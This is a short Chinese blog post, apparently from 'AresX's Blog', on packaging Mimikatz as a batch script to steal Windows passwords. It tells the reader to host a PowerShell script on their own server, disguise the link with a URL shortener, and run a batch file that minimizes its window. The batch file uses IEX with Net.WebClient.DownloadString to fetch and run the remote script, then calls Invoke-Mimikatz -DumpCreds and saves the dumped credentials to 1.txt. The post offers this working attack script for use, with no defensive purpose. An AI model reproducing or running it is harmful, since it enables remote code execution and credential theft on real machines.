mimikatz简要介绍
这篇文章一句powershell调用mimikatz抓密码中提到了这种方法
个人觉得制作成bat脚本使用起来会更加方便,但是唯一的缺点还是必须使用管理员权限启动
实际使用:
- 把ps1(powershell)脚本放在一台可以直接访问的服务器上
如果你下载不了说明你被墙了
-
复制访问链接如(http://x.x.x.x/getpass.ps1) 然后使用短网址生成器短链接
-
编写bat脚本,第四行的链接地址应为你自己存放ps1脚本的地址
@echo off
if not "%~1"=="p" start /min cmd.exe /c %0 p&exit
cd /d %~dp0
powershell "IEX (New-Object Net.WebClient).DownloadString('http://kks.me/a5x'); Invoke-Mimikatz -DumpCreds">>1.txt
- @echo off 不回显
- 最小化批处理进程
- 切换到脚本路径
- 使用powershell调用mimikatz抓取用户密码并且将结果保存到脚本所在路径下的1.txt中
*来自AresX’s Blog